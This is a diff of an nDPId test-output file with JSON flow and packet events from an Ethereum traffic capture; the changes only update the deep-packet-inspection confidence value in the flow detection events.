+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -322,13 +322,13 @@ 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} 
@@ -337,98 +337,98 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} 
